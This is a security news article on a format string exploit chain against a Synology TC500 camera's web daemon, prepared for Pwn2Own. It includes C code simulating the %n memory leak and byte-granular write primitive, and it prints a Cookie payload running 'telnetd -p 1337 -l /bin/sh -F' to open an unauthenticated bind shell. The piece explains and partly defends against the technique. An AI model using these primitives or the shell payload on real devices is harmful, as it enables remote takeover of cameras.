NEWS Stack Canary, PIE, ASLR — All for Nothing: Bug Hunters Demonstrate Synology Exploit Bypass

ExcalibuR


Deep in the stack lay a door someone simply forgot to close.


In the fall of 2024, the bug hunting team at InfoSect was preparing an exploit for the Pwn2Own Ireland competition, targeting remote code execution on the Synology TC500 IP camera. The basis of their attack was a format string vulnerability in the camera's web daemon, which let them leak addresses to defeat ASLR and then take full control of the device. Although Synology patched the bug at the last minute, the exploit development remains a powerful demonstration of how modern defenses can still be defeated.


The research began by analyzing the camera's firmware, which was publicly available for download. By emulating it, the team explored the services running on the device: a civetweb-based web interface and an RTSP server. The primary focus became the webd process, which handles HTTP requests. Despite the binary being built with PIE, RELRO and stack canaries, and the system enforcing ASLR, a critical vulnerability was found in its process_new_connection function.


Synology had added a debugging mechanism to webd: each worker thread, while processing a request, records the request URI in a global table via the set_thread_name function. The problem is that the value is formatted with mg_snprintf using the URI itself as the format string, with no check for format specifiers in it. That is a classic format string vulnerability: any % conversion in the URI is interpreted by the formatter, and %n turns a read into a write.
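The pattern behind the bug, as an added illustration that is not Synology's or InfoSect's code: a hypothetical set_thread_name-style helper in its vulnerable and hardened forms, plus a small check for conversion directives in attacker-supplied text. The function names, the buffer size and the sample URIs are assumptions made for the example.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for the per-thread logging helper: the request URI is
 * formatted into a name buffer. Names and sizes are assumptions for this example. */

/* Vulnerable pattern: attacker-controlled text is the format string.
 * gcc and clang flag exactly this with -Wformat-security; the pragma only
 * keeps the example compiling when that warning is promoted to an error. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"
static void set_thread_name_vulnerable(char *name, size_t size, const char *uri)
{
    snprintf(name, size, uri);            /* BUG: uri is interpreted as a format */
}
#pragma GCC diagnostic pop

/* Hardened form: the format is a constant and the URI is only ever an argument. */
static void set_thread_name_fixed(char *name, size_t size, const char *uri)
{
    snprintf(name, size, "%s", uri);
}

/* Defensive check for text that must never reach a format argument: a literal
 * "%%" is harmless, anything else following '%' would be parsed by printf. */
static bool has_format_directive(const char *s)
{
    for (const char *p = strchr(s, '%'); p != NULL; p = strchr(p, '%')) {
        if (p[1] == '%') { p += 2; continue; }   /* escaped percent, skip it */
        return true;                             /* a real conversion (or a trailing '%') */
    }
    return false;
}

/* True when the hardened path stores the URI byte-for-byte, whatever it contains. */
static bool fixed_preserves_input(const char *uri)
{
    char name[64];
    set_thread_name_fixed(name, sizeof name, uri);
    return strcmp(name, uri) == 0;
}

/* Same check for the vulnerable path. Only meaningful for directive-free URIs:
 * with a '%' in the input the behaviour is undefined, which is the whole point. */
static bool vulnerable_preserves_benign_input(const char *uri)
{
    char name[64];
    set_thread_name_vulnerable(name, sizeof name, uri);
    return strcmp(name, uri) == 0;
}
```

The two helpers differ by a single "%s", which is why this class of bug survives code review so easily; the detector is the kind of check a WAF rule or an input filter would apply in front of any logging path that cannot be fixed at the source.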


The formatted thread name is never sent back to the client, so the output could not be read directly. Stack analysis, however, revealed that one pointer on the stack referenced the HTTP version string, which is echoed back to the client in the response. By modifying that pointer with writes of the form %[len]c%[pos]$n (print len characters, then store the count through the pointer in stack slot pos), the attackers could make the echoed string point elsewhere and leak memory contents, bypassing ASLR. The reachable range was limited to 0x50000000–0x60000000, but that was enough to leak addresses inside the executable module.


The next phase was an arbitrary memory write. Using pointers already on the stack, the team built a pointer chain: p1 pointed to p2, and p2 to p3, which lay in a safe region of the stack. By altering the bytes of these pointers one at a time, each through the pointer one level up the chain, they could redirect p3 to any desired address and then write data through it.


From this, the team built a byte-granular arbitrary write primitive, which let them modify memory contents at will and prepare an attack on the free() function of glibc.
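The leak and the pointer-chain write primitive from the paragraphs above, as an added simulation that is not InfoSect's exploit code. The three stack slots are a small array, each call to fmt_write stands for one attacker-chosen format string of the form %[len]c%[pos]$n, and the memory next to the HTTP version string is constructed. It assumes a little-endian glibc host (x86-64 or AArch64) and that %n is honoured in a literal format string; the alignments, offsets and names are illustrative.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added simulation, not the real exploit: `slots` stands for the stack slots that
 * %1$, %2$ and %3$ reach on the target. One call is one format string
 * "%<value>c%<pos>$hhn": emit <value> bytes, then store that count (mod 256)
 * through the pointer found in slot <pos>. */
static void fmt_write(void *slots[3], int pos, unsigned value)
{
    char sink[512];                        /* the thread-name buffer nobody reads back */
    signed char *where = slots[pos - 1];
    /* "" padded to width <value> emits exactly <value> bytes; unlike %c this
     * allows a count of zero, needed when a target byte must become 0x00. */
    snprintf(sink, sizeof sink, "%2$*1$s%3$hhn", (int)value, "", where);
}

/* Leak: slot 2 points at the HTTP version string the server echoes back, slot 1
 * points at slot 2. One write through slot 1 changes the low byte of the echoed
 * pointer, so the response now carries whatever lies nearby. `page` is a
 * constructed stand-in for process memory around that string (256-aligned so the
 * low byte of its address is 0x00). */
static const char *leak_via_echo(void)
{
    static _Alignas(256) char page[32];
    memcpy(page, "HTTP/1.1", 9);           /* what the client normally gets back */
    memcpy(page + 16, "LEAKED", 7);        /* neighbouring data the attacker wants */
    void *slots[3] = { &slots[1], page, NULL };
    fmt_write(slots, 1, 16);               /* "%16c%1$hhn": page+0 becomes page+16 */
    return slots[1];                       /* what the server would echo now */
}

/* Arbitrary byte write through the chain p1 -> p2 -> p3. Via p1, steer p2 across
 * the bytes of p3; via p2, fill p3 with the target address one byte at a time;
 * via p3, write the value. Little-endian: byte 0 of a pointer is its low byte.
 * Returns the byte now stored at `target` so callers can verify the write. */
static unsigned char arb_write_byte(void *target, unsigned char value)
{
    _Alignas(16) void *slots[3];           /* p3's bytes never cross a 0x100 boundary */
    slots[0] = &slots[1];                  /* p1 -> p2 */
    slots[1] = &slots[2];                  /* p2 -> byte 0 of p3 */
    slots[2] = NULL;                       /* p3, filled in below */

    uintptr_t want = (uintptr_t)target;
    for (unsigned i = 0; i < sizeof(void *); i++) {
        unsigned lo = (unsigned)(((uintptr_t)&slots[2] + i) & 0xff);
        fmt_write(slots, 1, lo);                                   /* p2 -> byte i of p3 */
        fmt_write(slots, 2, (unsigned)((want >> (8 * i)) & 0xff)); /* p3[i] = target byte i */
    }
    fmt_write(slots, 3, value);            /* *target = value */
    return *(unsigned char *)target;
}

/* Round trip used for verification: start from the complement, write v, compare. */
static int write_roundtrip(unsigned char v)
{
    unsigned char cell = (unsigned char)~v;
    arb_write_byte(&cell, v);
    return cell == v;
}

int main(void)
{
    printf("echoed after redirect: %s\n", leak_via_echo());
    printf("roundtrip 0x41: %d, 0x00: %d, 0xff: %d\n",
           write_roundtrip(0x41), write_roundtrip(0x00), write_roundtrip(0xff));
    return 0;
}
```

The simulation hands fmt_write the slot pointers explicitly; the real exploit reached the same pointers by positional index into the stack of the request thread, and each step above corresponds to one HTTP request whose URI carried the format string.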


Using the earlier leak and the location of the .got section, they computed the address of __free_hook and overwrote it with the address of system(). To call free() with an argument they controlled, they used the GetSessionIdFromCookie function, which frees the buffer allocated for the Cookie header. If the Cookie header contained, for example, the string:

telnetd -p 1337 -l /bin/sh -F


then the call free(cookie) would effectively execute:

system("telnetd -p 1337 -l /bin/sh -F");


which starts a bind shell: telnetd listens on port 1337 and hands every incoming connection /bin/sh directly, with no login prompt.


Although the attack was never demonstrated at Pwn2Own because Synology shipped an urgent firmware update beforehand, the exploit chain is a textbook example of how a single format string bug, combined with knowledge of glibc internals, can give an attacker full control of a device despite every standard modern defense.
 